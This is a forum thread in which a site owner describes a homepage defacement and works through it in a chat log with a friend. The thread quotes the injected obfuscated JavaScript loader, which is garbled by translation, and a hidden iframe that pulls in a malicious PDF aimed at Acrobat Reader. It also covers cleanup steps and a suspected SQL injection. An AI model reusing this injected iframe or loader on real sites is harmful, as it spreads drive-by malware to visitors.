A recent attack on my site

[Huckleberry Pie]

OK, so Ram PM'd me on this, saying my message board was hacked. Here's our conversation:

stripedhamdonuts_moogle: but

stripedhamdonuts_moogle:

hxxp://www.chanchoi.cn.xx/cache/doc.pdf

peanuthead_069: ohh

stripedhamdonuts_moogle: that's the page alright

peanuthead_069: that's the site?

stripedhamdonuts_moogle: yeah

peanuthead_069: has malware, right?

stripedhamdonuts_moogle: the guy was trying an pdf trojan exploit

stripedhamdonuts_moogle: yep

stripedhamdonuts_moogle: [attenzione, il link contiene un exploit per acrobat reader!]

Probably translates to Attention: the link contains an exploit for Acrobat Reader

peanuthead_069: ok

peanuthead_069: we'll have this hax taken care of

stripedhamdonuts_moogle: ok, doing it message-by message

peanuthead_069: samspade the domain?

stripedhamdonuts_moogle: first post says:

hello to everyone,

I heard what happened:

I open the home of my site and instead of the usual page opens me a link to a pdf file

hxxp://www.chanchoi.cn.xx/cache/doc.pdf

[attention, the link contains an exploit for acrobat reader!] (edited out to prevent any infections)

The thing I was very unsuspected ... and I went to check my index.html file.

Someone must have changed (and how I would like to know) and we wrote in this code:

Zbody onload = "function a2 (s) (b =''; for (i = 0; the <s.length;i+=4>> 1) b + = s.charAt (i); return b;) document. write (a2 ( '\ 074u \ x64n \ 151k \ x76n \ 040th \ x73w \ 164n \ x79 \ 154th \ x65b \ 075f \ x22u \ 166s \ x69c \ 163rd \ x69t \ 142nd \ x69o \ 154n \ x69u \ 164n \ x79k \ 072n \ x68o \ 151w \ x64n \ 144 \ x65o \ 156b \ x22f \ 076u \ x3cs \ 151c \ x66a \ 162t \ x61i \ 155th \ x65n \ 040u \ x73n \ 162k \ x63n \ 075th \ x22w \ 150n \ x74 \ 164th \ x70b \ 072f \ x2fu \

peanuthead_069: I don't have teh PDF reader here

stripedhamdonuts_moogle: lucky you

stripedhamdonuts_moogle: I have Acrobat Reader 5.0.5, only because I can't be assed to get the multi-hundred-megabyte downloads of the latest version

stripedhamdonuts_moogle: reply 1:

I have not made clickable link because the pdf in question contains an exploit that attempts to exploit a vulnerability in Adobe Acrobat reader (not only vulnerable version 8.1.2 or newer) to run code on macchima.

The script on your site writes in the following code:

code:

<div style="visibility:hidden">

<iframe src="http://chanchoi.cn/index.php.x.mal" visibility:hidden width=100 height=80> </ iframe>

</ div>

A hidden iframe which loads the page then run physically download the pdf.

You should try to understand how it was possible to inject into your home page to prevent this from happening again ..

stripedhamdonuts_moogle: so, they used SQL injection...

peanuthead_069: maybe the chanchoi.cn site shares the same IP with the hackers

stripedhamdonuts_moogle: hmmm... or maybe hackers hacked the site to store their trojan exploit

stripedhamdonuts_moogle: third reply:

And indeed! What I do not understand is this! How is it possible that someone could change the homepage?

What could be the cause? There is something wrong with the site or is a problem of the server that is hosted?

I log in via ftp to upload files and the password is secure enough ... is what I was assegnatadi default and I never changed .. if not indeed even if you can change ... I do not know precisely where to investigate to find out ...

On the control panel of your domain I have not made any changes, the only novelty is that I recently requested the activation of php support to put a form of sending mail. That is linked in some way to that? Perhaps it is the fault of the form in php?

Ah forgot .. I apologize for putting a link harmful ... was not my intention to harm! Indeed, unfortunately I have downloaded and open the pdf apparentemenete and nothing has happened (at lea

stripedhamdonuts_moogle: yeah

peanuthead_069: Maybe if I asked my mate Chris for it.

stripedhamdonuts_moogle: well, if you're interested in the rest, go ahead and translate them one-by-one on Google translate. I'm fairly convinced that those assholes used an SQL injection exploit on the forums now

stripedhamdonuts_moogle: oh, crap

peanuthead_069: what the?

stripedhamdonuts_moogle:

Virus: HEUR/HTML.Malware

Type: AHeAD Heuristic special detection

In the wild: No

Reported Infections: Low

Distribution Potential: Low

Damage Potential: Low

Static file: No

stripedhamdonuts_moogle: second last post

peanuthead_069: any other cases of similar hacking sprees?

stripedhamdonuts_moogle: just search google using the js string

peanuthead_069: ok

stripedhamdonuts_moogle: about half a dozen, so it must've been fairly new

peanuthead_069: Well, I'm not really that good at maintaining a site the hard way, but at least it was a thrilling experience

peanuthead_069: you can't be a good sailor if you don't ride the rough waves, I guess

stripedhamdonuts_moogle: very true

peanuthead_069: k, restored the index.html file

stripedhamdonuts_moogle: and well, this is quite an experience for me too. Now I'm worried about the stuff on the server

stripedhamdonuts_moogle: need to find out if that dropped anything on this PC now

peanuthead_069: I kept the other file (0backup) as evidence in case I report this to the FBI

peanuthead_069: Or to the Third Echelon, I guess

stripedhamdonuts_moogle: hmmm, searched again, google returns about 26 results

stripedhamdonuts_moogle: if including the forum post, I guess it's 27

stripedhamdonuts_moogle: but then, this may be just one of the many strings used, so there may be more

peanuthead_069: hmm, did a quick browse on my ftp and there aren't any files that were tampered recently

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: so only the index then?

peanuthead_069: yep, I guess

stripedhamdonuts_moogle: k

peanuthead_069: How did they manage to leak into it?

peanuthead_069: Password attack?

stripedhamdonuts_moogle: well, that forum mentioned SQL Injection

peanuthead_069: I'll do a scan on the databases

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: guess we're lucky that they did not decide to destroy the database too

stripedhamdonuts_moogle: in any case, if there

stripedhamdonuts_moogle: s a new version of PhpBB, best upgrade for safety reasons

stripedhamdonuts_moogle: may be a vulnerability in the current PhpBB version?

peanuthead_069: maybe, but only the index.html in the root was tampered

stripedhamdonuts_moogle: hmmm...

peanuthead_069: the forum directory wasn't tampered I guess

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: any way we can force the server to redirect without using a index.html file?

peanuthead_069: nah, they might find another way

stripedhamdonuts_moogle: k

peanuthead_069: I'm planning on changing the password

stripedhamdonuts_moogle: k

peanuthead_069: and ask for some site security suggestions

stripedhamdonuts_moogle: good idea

I had the chanchoi URL edited to prevent infections; according to Norton SafeWeb, the site originated from Moldova, using a Chinese domain. The redirect script was obfuscated (read: masked); it made an invisible frame on the HTML file, which redirects to the script. This is an example of a drive-by download, in which exploits, or holes in the security of an application, are being taken advantage of in infecting users with malware.

I'm planning on some security measures on the site, such as a password change. Any thoughts on this?

[WRX22B1998]

Wow.

lol. thats pretty nuts. you don't know of anyone that hates you with a passion? cos thats pretty insane.

all i can say is, dont trust anyone.

[Huckleberry Pie]

Wow.

lol. thats pretty nuts. you don't know of anyone that hates you with a passion? cos thats pretty insane.

all i can say is, dont trust anyone.

Actually, I'm not the only one who had a similar problem...

[WRX22B1998]

hmm that's pretty weird eh.

i got this email with the subject "bbq cover requires urgent maintenance...or else", same as my dad. my dad rang up the person who "sent" it. supposedly they didnt even turn their computer on til 5 mins ago (like 1 hr after email was sent)...i told my friend he had a virus and he thought i was joking :S

[Huckleberry Pie]

Based on what I've seen, it turns out that they did it en masse, attacking other sites along the way.